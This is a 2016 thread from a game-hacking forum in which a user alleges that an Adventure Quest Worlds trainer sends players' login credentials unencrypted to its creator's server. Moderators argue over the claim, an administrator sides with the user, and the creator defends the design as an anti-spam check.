Thanks for your concern, but @master131 analyzed the said file himself and deemed it to be safe so yeah, not going to do anything about the file in question as such.
https://www.mpgh.net/forum/showthread.php?t=1156518
This trainer in the AQW hacks section at the moment is a blatant account stealer which is clearly unsafe and any attempts of me to mention it to the section moderator @Hunter have been deleted without reason and he has refused conference with me over the issue. I'd love to explain to him why it isn't safe, but since he doesn't seem to want to hear it I'll just tell you here.
This is the post request sent when adding a bot with the trainer's add bot feature. The username and password there are my AQW login credentials being sent to noticemeae.cf which is the creator's personal website. Also take note of how my password is being sent completely unencrypted which means anyone connected to the same wifi as me could easily intercept and steal my password.
Here is a message from the owner defending it saying that it deletes your password and does not store them. We can take this for a grain of salt though considering all the handling of the data is done within the PHP which is 100% server sided. Meaning it can be changed at any time without the knowledge of any of the users or staff who may have inspected it.
Stupidly large.
Thanks for your concern, but @master131 analyzed the said file himself and deemed it to be safe so yeah, not going to do anything about the file in question as such.
Last edited by Hunter; 08-20-2016 at 12:03 PM.
I've provided all the proof required, all the data is handled on the server so even if he analyzed it and said that its safe, they could change the PHP to store passwords without your knowledge, none of it is handled client sided, what are you having trouble understanding?
- - - Updated - - -
@Hunter I appreciate your opinion but I don't believe you're qualified to weigh in on the matter, could you please get some other staff in here that will be able to discuss the logistics of the program's operations? You said you don't care about me so you're obviously playing biases hard.
Last edited by Zeffer; 08-20-2016 at 12:07 PM.
Stupidly large.
Playing biases hard? Oh please, give me a break. Everyone knows I've no problem in punishing one for their wrongdoing regardless of who they may be. The thing is, master131 is our finest file analyzer and as such, I'd rather trust his judgement over yours. If he deems the said file not to be safe after all, then I'll delete its thread otherwise I won't do absolutely anything about it.
Last edited by Hunter; 08-20-2016 at 12:22 PM. Reason: Typos.
@master131
Can you come and tell me how this program is safe given the information I've provided? Give me facts, all I've been given so far is that you've checked it, I've been given no facts on how it's actually safe considering the way the program operates.
Last edited by Zeffer; 08-20-2016 at 12:17 PM.
Stupidly large.
Sending a password/username to a third party server isn't safe.
I'll investigate it.
THE EYE OF AN ADMINISTRATOR IS UPON YOU. ANY WRONG YOU DO IM GONNA SEE, WHEN YOU'RE ON MPGH, LOOK BEHIND YOU, 'CAUSE THATS WHERE IM GONNA BE
"First they ignore you. Then they laugh at you. Then they fight you. Then you lose.” - Dave84311
HAVING VIRTUAL DETOX
The file should not have been approved. The reason sounds like bullshit... to ensure that no spamming occurs? What does that even mean? @ToxLP
THE EYE OF AN ADMINISTRATOR IS UPON YOU. ANY WRONG YOU DO IM GONNA SEE, WHEN YOU'RE ON MPGH, LOOK BEHIND YOU, 'CAUSE THATS WHERE IM GONNA BE
"First they ignore you. Then they laugh at you. Then they fight you. Then you lose.” - Dave84311
HAVING VIRTUAL DETOX
chibizs (08-20-2016),[MPGH]Jim Morrison (08-20-2016),Zeffer (08-20-2016)
ty hunter for reassuring us that the file is 100% safe
Last edited by sa3m; 08-20-2016 at 01:22 PM. Reason: fixed grammar error
Hey so lemme explain please in v0.01 when i did not add any security what users did was spam more than 10k bots luckily they had similar names like name-1,name-2 etc.
I had to delete all that with a Delete where like sql query so in v0.02 i needed to implement a feature which stops spamming so i thought of this
I made the user and pass get sent to the php post what i used the user and pass for is
Make a curl post request to the actual game login with the user and pass supplied if the response was a success it meant the user is legit and can add a bot, if it wasn't it blocked the request
I only saved the Username,BotName,BotData,Ip
Ip,Username are used to ban users from adding to make sure there the right spammers,
So the delete bot function can make sure the the correct user is deleting it,It also had the User,Pass sent there and made a curl request again to make sure spammers weren't spamming delete.
Edit:
In the end i never saved any password of any user,
Only thing i saved that was there's is Just there Username And Ip.
Last edited by ToxLP; 08-20-2016 at 01:24 PM.
Why was the pass even needed, check the current state of login and username.. Kek. A captcha, anything would work. And if you save a username and ip, if your app isn't secure, whats to say the server is? One db dump and you have fucked everyone using your bot. Might as well be a username collector for ae.
Also, I can spam create aqw accounts and then spam your bot, so your security wouldn't have worked except for basic spamming.
Edit: you could've also just checked character pages to see if the account existed.
Last edited by chibizs; 08-20-2016 at 02:51 PM. Reason: Another thought
Want an Adventure Quest, DragonFable, or Mechquest trainer. If you answered yes to any of these then click here.
PkDude's Legacy V1.2
If you need help with AQW Private server creation then click Here.
If I have helped please press thanks. It doesn't take much effort and it means a lot to me.
Demaier (08-20-2016)
Thread won't be undeleted and will remain that way. Reprimand will be handed out.
[ • ] [ • ] [ • ] [ • ][ • ]
Editor from 06•14•2011 • 2014
Donator since 09•16•2011
Minion from 10•10•2011 • 01•06•2011
Minion+ from 01•06•2012 • 08•08•2012
Moderator from 08•08•2012 • 10•06•2012
Global Moderator from 10•06•2012 • 12•05•2017
Staff Administrator from 12•05•2017 • 05•01•2019
Trusted Member since 07•13•2019
Global Moderator since 09•11•2020